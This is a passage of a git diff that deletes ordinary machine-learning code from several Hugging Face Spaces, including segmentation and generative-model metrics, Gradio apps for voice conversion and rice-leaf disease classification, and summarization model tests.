float: Overall accuracy on all images. - ndarray: Per category accuracy, shape (num_classes, ). - ndarray: Per category IoU, shape (num_classes, ). - """ - iou_result = eval_metrics( - results=results, - gt_seg_maps=gt_seg_maps, - num_classes=num_classes, - ignore_index=ignore_index, - metrics=['mIoU'], - nan_to_num=nan_to_num, - label_map=label_map, - reduce_zero_label=reduce_zero_label) - return iou_result - - -def mean_dice(results, - gt_seg_maps, - num_classes, - ignore_index, - nan_to_num=None, - label_map=dict(), - reduce_zero_label=False): - """Calculate Mean Dice (mDice) - - Args: - results (list[ndarray] | list[str]): List of prediction segmentation - maps or list of prediction result filenames. - gt_seg_maps (list[ndarray] | list[str]): list of ground truth - segmentation maps or list of label filenames. - num_classes (int): Number of categories. - ignore_index (int): Index that will be ignored in evaluation. - nan_to_num (int, optional): If specified, NaN values will be replaced - by the numbers defined by the user. Default: None. - label_map (dict): Mapping old labels to new labels. Default: dict(). - reduce_zero_label (bool): Wether ignore zero label. Default: False. - - Returns: - dict[str, float | ndarray]: Default metrics. - float: Overall accuracy on all images. - ndarray: Per category accuracy, shape (num_classes, ). - ndarray: Per category dice, shape (num_classes, ). 
- """ - - dice_result = eval_metrics( - results=results, - gt_seg_maps=gt_seg_maps, - num_classes=num_classes, - ignore_index=ignore_index, - metrics=['mDice'], - nan_to_num=nan_to_num, - label_map=label_map, - reduce_zero_label=reduce_zero_label) - return dice_result - - -def mean_fscore(results, - gt_seg_maps, - num_classes, - ignore_index, - nan_to_num=None, - label_map=dict(), - reduce_zero_label=False, - beta=1): - """Calculate Mean Intersection and Union (mIoU) - - Args: - results (list[ndarray] | list[str]): List of prediction segmentation - maps or list of prediction result filenames. - gt_seg_maps (list[ndarray] | list[str]): list of ground truth - segmentation maps or list of label filenames. - num_classes (int): Number of categories. - ignore_index (int): Index that will be ignored in evaluation. - nan_to_num (int, optional): If specified, NaN values will be replaced - by the numbers defined by the user. Default: None. - label_map (dict): Mapping old labels to new labels. Default: dict(). - reduce_zero_label (bool): Wether ignore zero label. Default: False. - beta (int): Determines the weight of recall in the combined score. - Default: False. - - - Returns: - dict[str, float | ndarray]: Default metrics. - float: Overall accuracy on all images. - ndarray: Per category recall, shape (num_classes, ). - ndarray: Per category precision, shape (num_classes, ). - ndarray: Per category f-score, shape (num_classes, ). - """ - fscore_result = eval_metrics( - results=results, - gt_seg_maps=gt_seg_maps, - num_classes=num_classes, - ignore_index=ignore_index, - metrics=['mFscore'], - nan_to_num=nan_to_num, - label_map=label_map, - reduce_zero_label=reduce_zero_label, - beta=beta) - return fscore_result - - -def eval_metrics(results, - gt_seg_maps, - num_classes, - ignore_index, - metrics=['mIoU'], - nan_to_num=None, - label_map=dict(), - reduce_zero_label=False, - beta=1): - """Calculate evaluation metrics - Args: - results (list[ndarray] | list[str]): List of prediction segmentation - maps or list of prediction result filenames. - gt_seg_maps (list[ndarray] | list[str]): list of ground truth - segmentation maps or list of label filenames. - num_classes (int): Number of categories. - ignore_index (int): Index that will be ignored in evaluation. - metrics (list[str] | str): Metrics to be evaluated, 'mIoU' and 'mDice'. - nan_to_num (int, optional): If specified, NaN values will be replaced - by the numbers defined by the user. Default: None. - label_map (dict): Mapping old labels to new labels. Default: dict(). - reduce_zero_label (bool): Wether ignore zero label. Default: False. - Returns: - float: Overall accuracy on all images. - ndarray: Per category accuracy, shape (num_classes, ). - ndarray: Per category evaluation metrics, shape (num_classes, ). 
- """ - if isinstance(metrics, str): - metrics = [metrics] - allowed_metrics = ['mIoU', 'mDice', 'mFscore'] - if not set(metrics).issubset(set(allowed_metrics)): - raise KeyError('metrics {} is not supported'.format(metrics)) - - total_area_intersect, total_area_union, total_area_pred_label, \ - total_area_label = total_intersect_and_union( - results, gt_seg_maps, num_classes, ignore_index, label_map, - reduce_zero_label) - all_acc = total_area_intersect.sum() / total_area_label.sum() - ret_metrics = OrderedDict({'aAcc': all_acc}) - for metric in metrics: - if metric == 'mIoU': - iou = total_area_intersect / total_area_union - acc = total_area_intersect / total_area_label - ret_metrics['IoU'] = iou - ret_metrics['Acc'] = acc - elif metric == 'mDice': - dice = 2 * total_area_intersect / ( - total_area_pred_label + total_area_label) - acc = total_area_intersect / total_area_label - ret_metrics['Dice'] = dice - ret_metrics['Acc'] = acc - elif metric == 'mFscore': - precision = total_area_intersect / total_area_pred_label - recall = total_area_intersect / total_area_label - f_value = torch.tensor( - [f_score(x[0], x[1], beta) for x in zip(precision, recall)]) - ret_metrics['Fscore'] = f_value - ret_metrics['Precision'] = precision - ret_metrics['Recall'] = recall - - ret_metrics = { - metric: value.numpy() - for metric, value in ret_metrics.items() - } - if nan_to_num is not None: - ret_metrics = OrderedDict({ - metric: np.nan_to_num(metric_value, nan=nan_to_num) - for metric, metric_value in ret_metrics.items() - }) - return ret_metrics diff --git a/spaces/abionchito/rvc-models/app.py b/spaces/abionchito/rvc-models/app.py deleted file mode 100644 index 8f1dd8103616f47920fdd5a43d91e847250a3833..0000000000000000000000000000000000000000 --- a/spaces/abionchito/rvc-models/app.py +++ /dev/null @@ -1,188 +0,0 @@ -import os -import json -import argparse -import traceback -import logging -import gradio as gr -import numpy as np -import librosa -import torch -import asyncio -import edge_tts -from datetime import datetime -from fairseq import checkpoint_utils -from infer_pack.models import SynthesizerTrnMs256NSFsid, SynthesizerTrnMs256NSFsid_nono -from vc_infer_pipeline import VC -from config import ( - is_half, - device -) -logging.getLogger("numba").setLevel(logging.WARNING) -limitation = os.getenv("SYSTEM") == "spaces" # limit audio length in huggingface spaces - -def create_vc_fn(tgt_sr, net_g, vc, if_f0, file_index, file_big_npy): - def vc_fn( - input_audio, - f0_up_key, - f0_method, - index_rate, - tts_mode, - tts_text, - tts_voice - ): - try: - if tts_mode: - if len(tts_text) > 100 and limitation: - return "Text is too long", None - if tts_text is None or tts_voice is None: - return "You need to enter text and select a voice", None - asyncio.run(edge_tts.Communicate(tts_text, "-".join(tts_voice.split('-')[:-1])).save("tts.mp3")) - audio, sr = librosa.load("tts.mp3", sr=16000, mono=True) - else: - if args.files: - audio, sr = librosa.load(input_audio, sr=16000, mono=True) - else: - if input_audio is None: - return "You need to upload an audio", None - sampling_rate, audio = input_audio - duration = audio.shape[0] / sampling_rate - if duration > 20 and limitation: - return "Please upload an audio file that is less than 20 seconds. 
If you need to generate a longer audio file, please use Colab.", None - audio = (audio / np.iinfo(audio.dtype).max).astype(np.float32) - if len(audio.shape) > 1: - audio = librosa.to_mono(audio.transpose(1, 0)) - if sampling_rate != 16000: - audio = librosa.resample(audio, orig_sr=sampling_rate, target_sr=16000) - times = [0, 0, 0] - f0_up_key = int(f0_up_key) - audio_opt = vc.pipeline( - hubert_model, - net_g, - 0, - audio, - times, - f0_up_key, - f0_method, - file_index, - file_big_npy, - index_rate, - if_f0, - ) - print( - f"[{datetime.now().strftime('%Y-%m-%d %H:%M')}]: npy: {times[0]}, f0: {times[1]}s, infer: {times[2]}s" - ) - return "Success", (tgt_sr, audio_opt) - except: - info = traceback.format_exc() - print(info) - return info, (None, None) - return vc_fn - -def load_hubert(): - global hubert_model - models, _, _ = checkpoint_utils.load_model_ensemble_and_task( - ["hubert_base.pt"], - suffix="", - ) - hubert_model = models[0] - hubert_model = hubert_model.to(device) - if is_half: - hubert_model = hubert_model.half() - else: - hubert_model = hubert_model.float() - hubert_model.eval() - -def change_to_tts_mode(tts_mode): - if tts_mode: - return gr.Audio.update(visible=False), gr.Textbox.update(visible=True), gr.Dropdown.update(visible=True) - else: - return gr.Audio.update(visible=True), gr.Textbox.update(visible=False), gr.Dropdown.update(visible=False) - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--api', action="store_true", default=False) - parser.add_argument("--share", action="store_true", default=False, help="share gradio app") - parser.add_argument("--files", action="store_true", default=False, help="load audio from path") - args, unknown = parser.parse_known_args() - load_hubert() - models = [] - tts_voice_list = asyncio.get_event_loop().run_until_complete(edge_tts.list_voices()) - voices = [f"{v['ShortName']}-{v['Gender']}" for v in tts_voice_list] - with open("weights/model_info.json", "r", encoding="utf-8") as f: - models_info = json.load(f) - for name, info in models_info.items(): - if not info['enable']: - continue - title = info['title'] - author = info.get("author", None) - cover = f"weights/{name}/{info['cover']}" - index = f"weights/{name}/{info['feature_retrieval_library']}" - npy = f"weights/{name}/{info['feature_file']}" - cpt = torch.load(f"weights/{name}/{name}.pth", map_location="cpu") - tgt_sr = cpt["config"][-1] - cpt["config"][-3] = cpt["weight"]["emb_g.weight"].shape[0] # n_spk - if_f0 = cpt.get("f0", 1) - if if_f0 == 1: - net_g = SynthesizerTrnMs256NSFsid(*cpt["config"], is_half=is_half) - else: - net_g = SynthesizerTrnMs256NSFsid_nono(*cpt["config"]) - del net_g.enc_q - print(net_g.load_state_dict(cpt["weight"], strict=False)) # 不加这一行清不干净, 真奇葩 - net_g.eval().to(device) - if is_half: - net_g = net_g.half() - else: - net_g = net_g.float() - vc = VC(tgt_sr, device, is_half) - models.append((name, title, author, cover, create_vc_fn(tgt_sr, net_g, vc, if_f0, index, npy))) - with gr.Blocks() as app: - gr.Markdown( - "#
<center> RVC Models (Outdated)\n"
 - "## <center> The input audio should be clean and pure voice without background music.\n"
 - "### <center> Updated Repository: [NEW RVC Models](https://huggingface.co/spaces/ArkanDash/rvc-models-new).\n"
 - "#### <center> Recommended to use the Google Colab version for more features.\n"
 - "![visitor badge](https://visitor-badge.glitch.me/badge?page_id=ArkanDash.Rvc-Models)\n\n"
 - "[![image](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/drive/1hx6kKvIuv5XNY1Gai2PEuZhpO5z6xpVh?usp=sharing)\n\n"
 - "[![Original Repo](https://badgen.net/badge/icon/github?icon=github&label=Original%20Repo)](https://github.com/RVC-Project/Retrieval-based-Voice-Conversion-WebUI)"
 - )
 - with gr.Tabs():
 - for (name, title, author, cover, vc_fn) in models:
 - with gr.TabItem(name):
 - with gr.Row():
 - gr.Markdown(
 - '<div align="center">'
 - f'<div>{title}</div>\n'+
 - (f'<div>Model author: {author}</div>' if author else "")+
 - (f'<img style="width:auto;height:300px;" src="file/{cover}">' if cover else "")+
 - '</div>
    ' - ) - with gr.Row(): - with gr.Column(): - if args.files: - vc_input = gr.Textbox(label="Input audio path") - else: - vc_input = gr.Audio(label="Input audio"+' (less than 20 seconds)' if limitation else '') - vc_transpose = gr.Number(label="Transpose", value=0) - vc_f0method = gr.Radio( - label="Pitch extraction algorithm, PM is fast but Harvest is better for low frequencies", - choices=["pm", "harvest"], - value="pm", - interactive=True, - ) - vc_index_ratio = gr.Slider( - minimum=0, - maximum=1, - label="Retrieval feature ratio", - value=0.6, - interactive=True, - ) - tts_mode = gr.Checkbox(label="tts (use edge-tts as input)", value=False) - tts_text = gr.Textbox(visible=False,label="TTS text (100 words limitation)" if limitation else "TTS text") - tts_voice = gr.Dropdown(label="Edge-tts speaker", choices=voices, visible=False, allow_custom_value=False, value="en-US-AnaNeural-Female") - vc_submit = gr.Button("Generate", variant="primary") - with gr.Column(): - vc_output1 = gr.Textbox(label="Output Message") - vc_output2 = gr.Audio(label="Output Audio") - vc_submit.click(vc_fn, [vc_input, vc_transpose, vc_f0method, vc_index_ratio, tts_mode, tts_text, tts_voice], [vc_output1, vc_output2]) - tts_mode.change(change_to_tts_mode, [tts_mode], [vc_input, tts_text, tts_voice]) - app.queue(concurrency_count=1, max_size=20, api_open=args.api).launch(share=args.share) \ No newline at end of file diff --git a/spaces/adityapathakk/crop-health/app.py b/spaces/adityapathakk/crop-health/app.py deleted file mode 100644 index 73c1d37e15047ecbdab2d4c6bc84c1588185e3ae..0000000000000000000000000000000000000000 --- a/spaces/adityapathakk/crop-health/app.py +++ /dev/null @@ -1,75 +0,0 @@ -import os -import copy -import torch -import gradio -import gradio as gr -from PIL import Image -import torch.nn as nn -from torchvision import transforms, models -device = torch.device('cuda' if torch.cuda.is_available() else 'cpu') - -os.system("wget https://www.dropbox.com/s/3us120bz5lhoh0t/model_best.pt?dl=0") - -model = models.resnet50(pretrained=True) -num_ftrs = model.fc.in_features -# Here the size of each output sample is set to 2. -# Alternatively, it can be generalized to nn.Linear(num_ftrs, len(class_names)). 
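-# The 7 outputs configured below correspond to the seven rice-leaf classes in the `labels` list defined later in this file (Bacterialblight, Blast, Brownspot, Healthy, Hispa, LeafBlast, Tungro).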
-model.fc = nn.Linear(num_ftrs, 7) - -model.load_state_dict(torch.load("./model_best.pt?dl=0", map_location=device)) - -# img = Image.open(path).convert('RGB') -# from torchvision import transforms - -transforms2 = transforms.Compose([ - transforms.Resize(224), - transforms.ToTensor(), - transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]) - ]) - -# img = transforms(img) -# img = img.unsqueeze(0) -model.eval() - -labels = ["Bacterialblight", -"Blast", -"Brownspot", -"Healthy", -"Hispa", -"LeafBlast", -"Tungro"] -# with torch.no_grad(): -# # preds = -# preds = model(img) -# score, indices = torch.max(preds, 1) - -def recognize_digit(image): - image = transforms2(image) - image = image.unsqueeze(0) - # image = image.unsqueeze(0) - # image = image.reshape(1, -1) - # with torch.no_grad(): - # preds = - # img = image.reshape((-1, 3, 256, 256)) - preds = model(image).flatten() - # prediction = model.predict(image).tolist()[0] - # score, indices = torch.max(preds, 1) - # return {str(indices.item())} - return {labels[i]: float(preds[i]) for i in range(7)} - - -im = gradio.inputs.Image( - shape=(224, 224), image_mode="RGB", type="pil") - -iface = gr.Interface( - recognize_digit, - im, - gradio.outputs.Label(num_top_classes=3), - live=True, - #interpretation="default", - # examples=[["images/cheetah1.jpg"], ["images/lion.jpg"]], - capture_session=True, -) - -iface.test_launch() -iface.launch() \ No newline at end of file diff --git a/spaces/akhaliq/SummerTime/model/multi_doc/base_multi_doc_model.py b/spaces/akhaliq/SummerTime/model/multi_doc/base_multi_doc_model.py deleted file mode 100644 index 4fd304350cc6fef91acb348bcd8dfc03a8f039e9..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/SummerTime/model/multi_doc/base_multi_doc_model.py +++ /dev/null @@ -1,40 +0,0 @@ -from model.base_model import SummModel - - -class MultiDocSummModel(SummModel): - - is_multi_document = True - - def __init__( - self, - trained_domain: str = None, - max_input_length: int = None, - max_output_length: int = None, - ): - super(MultiDocSummModel, self).__init__( - trained_domain=trained_domain, - max_input_length=max_input_length, - max_output_length=max_output_length, - ) - - @classmethod - def assert_summ_input_type(cls, corpus, query): - if not all( - [ - isinstance(ins, list) and all([isinstance(doc, str) for doc in ins]) - for ins in corpus - ] - ): - raise TypeError( - "Multi-document summarization models summarize instances of multiple documents (`List[List[str]]`)." - ) - - if query is not None: - if not isinstance(query, list): - raise TypeError( - "Query-based single-document summarization requires query of `List[str]`." - ) - if not all([isinstance(q, str) for q in query]): - raise TypeError( - "Query-based single-document summarization requires query of `List[str]`." 
- ) diff --git a/spaces/akhaliq/SummerTime/tests/dataset_test.py b/spaces/akhaliq/SummerTime/tests/dataset_test.py deleted file mode 100644 index 8f519512c3792d7b2dc86891fdbd303fb77ccdd9..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/SummerTime/tests/dataset_test.py +++ /dev/null @@ -1,83 +0,0 @@ -import unittest - -from dataset import SUPPORTED_SUMM_DATASETS, list_all_datasets -from dataset.st_dataset import SummDataset, SummInstance -from dataset.dataset_loaders import ArxivDataset - -from helpers import print_with_color - - -class TestDatasets(unittest.TestCase): - def _test_instance( - self, - ins: SummInstance, - is_query: bool = False, - is_multi_document: bool = False, - is_dialogue: bool = False, - ): - if is_multi_document or is_dialogue: - self.assertTrue(isinstance(ins.source, list)) - else: - self.assertTrue(isinstance(ins.source, list) or isinstance(ins.source, str)) - if is_query: - self.assertTrue(isinstance(ins.query, str)) - - def test_all_datasets(self): - print_with_color(f"{'#' * 10} Testing all datasets... {'#' * 10}\n\n", "35") - - print(list_all_datasets()) - - num_datasets = 0 - - for ds_cls in SUPPORTED_SUMM_DATASETS: - - # TODO: Temporarily skipping Arxiv (size/time), > 30min download time for Travis-CI - if ds_cls in [ArxivDataset]: - continue - - print_with_color(f"Testing {ds_cls} dataset...", "35") - ds: SummDataset = ds_cls() - - ds.show_description() - - # must have at least one of train/dev/test set - assert ds.train_set or ds.validation_set or ds.test_set - - if ds.train_set is not None: - train_set = list(ds.train_set) - print(f"{ds_cls} has a training set of {len(train_set)} examples") - self._test_instance( - train_set[0], - is_multi_document=ds.is_multi_document, - is_dialogue=ds.is_dialogue_based, - ) - - if ds.validation_set is not None: - val_set = list(ds.validation_set) - print(f"{ds_cls} has a validation set of {len(val_set)} examples") - self._test_instance( - val_set[0], - is_multi_document=ds.is_multi_document, - is_dialogue=ds.is_dialogue_based, - ) - - if ds.test_set is not None: - test_set = list(ds.test_set) - print(f"{ds_cls} has a test set of {len(test_set)} examples") - self._test_instance( - test_set[0], - is_multi_document=ds.is_multi_document, - is_dialogue=ds.is_dialogue_based, - ) - - print_with_color(f"{ds.dataset_name} dataset test complete\n", "32") - num_datasets += 1 - - print_with_color( - f"{'#' * 10} test_all_datasets {__name__} complete ({num_datasets} datasets) {'#' * 10}", - "32", - ) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/akhaliq/stylegan3_clip/metrics/precision_recall.py b/spaces/akhaliq/stylegan3_clip/metrics/precision_recall.py deleted file mode 100644 index 17e5b4286b43e2d09aeba19d2521869a6cbe7ea1..0000000000000000000000000000000000000000 --- a/spaces/akhaliq/stylegan3_clip/metrics/precision_recall.py +++ /dev/null @@ -1,62 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -# -# NVIDIA CORPORATION and its licensors retain all intellectual property -# and proprietary rights in and to this software, related documentation -# and any modifications thereto. Any use, reproduction, disclosure or -# distribution of this software and related documentation without an express -# license agreement from NVIDIA CORPORATION is strictly prohibited. - -"""Precision/Recall (PR) from the paper "Improved Precision and Recall -Metric for Assessing Generative Models". Matches the original implementation -by Kynkaanniemi et al. 
at -https://github.com/kynkaat/improved-precision-and-recall-metric/blob/master/precision_recall.py""" - -import torch -from . import metric_utils - -#---------------------------------------------------------------------------- - -def compute_distances(row_features, col_features, num_gpus, rank, col_batch_size): - assert 0 <= rank < num_gpus - num_cols = col_features.shape[0] - num_batches = ((num_cols - 1) // col_batch_size // num_gpus + 1) * num_gpus - col_batches = torch.nn.functional.pad(col_features, [0, 0, 0, -num_cols % num_batches]).chunk(num_batches) - dist_batches = [] - for col_batch in col_batches[rank :: num_gpus]: - dist_batch = torch.cdist(row_features.unsqueeze(0), col_batch.unsqueeze(0))[0] - for src in range(num_gpus): - dist_broadcast = dist_batch.clone() - if num_gpus > 1: - torch.distributed.broadcast(dist_broadcast, src=src) - dist_batches.append(dist_broadcast.cpu() if rank == 0 else None) - return torch.cat(dist_batches, dim=1)[:, :num_cols] if rank == 0 else None - -#---------------------------------------------------------------------------- - -def compute_pr(opts, max_real, num_gen, nhood_size, row_batch_size, col_batch_size): - detector_url = 'https://api.ngc.nvidia.com/v2/models/nvidia/research/stylegan3/versions/1/files/metrics/vgg16.pkl' - detector_kwargs = dict(return_features=True) - - real_features = metric_utils.compute_feature_stats_for_dataset( - opts=opts, detector_url=detector_url, detector_kwargs=detector_kwargs, - rel_lo=0, rel_hi=0, capture_all=True, max_items=max_real).get_all_torch().to(torch.float16).to(opts.device) - - gen_features = metric_utils.compute_feature_stats_for_generator( - opts=opts, detector_url=detector_url, detector_kwargs=detector_kwargs, - rel_lo=0, rel_hi=1, capture_all=True, max_items=num_gen).get_all_torch().to(torch.float16).to(opts.device) - - results = dict() - for name, manifold, probes in [('precision', real_features, gen_features), ('recall', gen_features, real_features)]: - kth = [] - for manifold_batch in manifold.split(row_batch_size): - dist = compute_distances(row_features=manifold_batch, col_features=manifold, num_gpus=opts.num_gpus, rank=opts.rank, col_batch_size=col_batch_size) - kth.append(dist.to(torch.float32).kthvalue(nhood_size + 1).values.to(torch.float16) if opts.rank == 0 else None) - kth = torch.cat(kth) if opts.rank == 0 else None - pred = [] - for probes_batch in probes.split(row_batch_size): - dist = compute_distances(row_features=probes_batch, col_features=manifold, num_gpus=opts.num_gpus, rank=opts.rank, col_batch_size=col_batch_size) - pred.append((dist <= kth).any(dim=1) if opts.rank == 0 else None) - results[name] = float(torch.cat(pred).to(torch.float32).mean() if opts.rank == 0 else 'nan') - return results['precision'], results['recall'] - -#---------------------------------------------------------------------------- diff --git a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/html5lib/filters/whitespace.py b/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/html5lib/filters/whitespace.py deleted file mode 100644 index 0d12584b45995d35110f75af00193fdad0fa10f4..0000000000000000000000000000000000000000 --- a/spaces/alexray/btc_predictor/venv/lib/python3.10/site-packages/pip/_vendor/html5lib/filters/whitespace.py +++ /dev/null @@ -1,38 +0,0 @@ -from __future__ import absolute_import, division, unicode_literals - -import re - -from . 
import base -from ..constants import rcdataElements, spaceCharacters -spaceCharacters = "".join(spaceCharacters) - -SPACES_REGEX = re.compile("[%s]+" % spaceCharacters) - - -class Filter(base.Filter): - """Collapses whitespace except in pre, textarea, and script elements""" - spacePreserveElements = frozenset(["pre", "textarea"] + list(rcdataElements)) - - def __iter__(self): - preserve = 0 - for token in base.Filter.__iter__(self): - type = token["type"] - if type == "StartTag" \ - and (preserve or token["name"] in self.spacePreserveElements): - preserve += 1 - - elif type == "EndTag" and preserve: - preserve -= 1 - - elif not preserve and type == "SpaceCharacters" and token["data"]: - # Test on token["data"] above to not introduce spaces where there were not - token["data"] = " " - - elif not preserve and type == "Characters": - token["data"] = collapse_spaces(token["data"]) - - yield token - - -def collapse_spaces(text): - return SPACES_REGEX.sub(' ', text) diff --git a/spaces/aliabd/SummerTime/evaluation/meteor_metric.py b/spaces/aliabd/SummerTime/evaluation/meteor_metric.py deleted file mode 100644 index e2c6c0bfc340b461a9660d6a2da63a35d3e1177a..0000000000000000000000000000000000000000 --- a/spaces/aliabd/SummerTime/evaluation/meteor_metric.py +++ /dev/null @@ -1,31 +0,0 @@ -from .base_metric import SummMetric -from typing import List, Dict -from nltk.translate import meteor_score as nltk_meteor -import nltk -import statistics - - -class Meteor(SummMetric): - metric_name = "meteor" - range = (0, 1) - higher_is_better = True - requires_heavy_compute = False - - def __init__(self): - nltk.download("wordnet") - - def evaluate( - self, inputs: List[str], targets: List[str], keys=["meteor"] - ) -> Dict[str, float]: - - for key in keys: - if key != "meteor": - raise KeyError(key, "is not a valid key") - - meteor_scores = [ - nltk_meteor.meteor_score([input], target) - for input, target in zip(inputs, targets) - ] - meteor_score = statistics.mean(meteor_scores) - - return {key: meteor_score for key in keys} diff --git a/spaces/aliceoq/vozes-da-loirinha/lib/infer_pack/models.py b/spaces/aliceoq/vozes-da-loirinha/lib/infer_pack/models.py deleted file mode 100644 index 3665d03bc0514a6ed07d3372ea24717dae1e0a65..0000000000000000000000000000000000000000 --- a/spaces/aliceoq/vozes-da-loirinha/lib/infer_pack/models.py +++ /dev/null @@ -1,1142 +0,0 @@ -import math, pdb, os -from time import time as ttime -import torch -from torch import nn -from torch.nn import functional as F -from lib.infer_pack import modules -from lib.infer_pack import attentions -from lib.infer_pack import commons -from lib.infer_pack.commons import init_weights, get_padding -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from lib.infer_pack.commons import init_weights -import numpy as np -from lib.infer_pack import commons - - -class TextEncoder256(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(256, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - 
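# Descriptive note on the encoder wiring (based only on the code visible here): the 256-dim
# `phone` features are projected to hidden_channels and, when f0 is enabled, summed with a
# learned pitch embedding; the attention encoder below turns them into hidden states from
# which `proj` emits out_channels * 2 values per frame, which forward() splits into the
# prior mean `m` and log-scale `logs`.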
self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class TextEncoder768(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(768, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class ResidualCouplingBlock(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0, - ): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer( - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - mean_only=True, - ) - ) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - def remove_weight_norm(self): - for i in range(self.n_flows): - self.flows[i * 2].remove_weight_norm() - - -class PosteriorEncoder(nn.Module): - def __init__( - self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, 
hidden_channels, 1) - self.enc = modules.WN( - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - def remove_weight_norm(self): - self.enc.remove_weight_norm() - - -class Generator(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=0, - ): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: 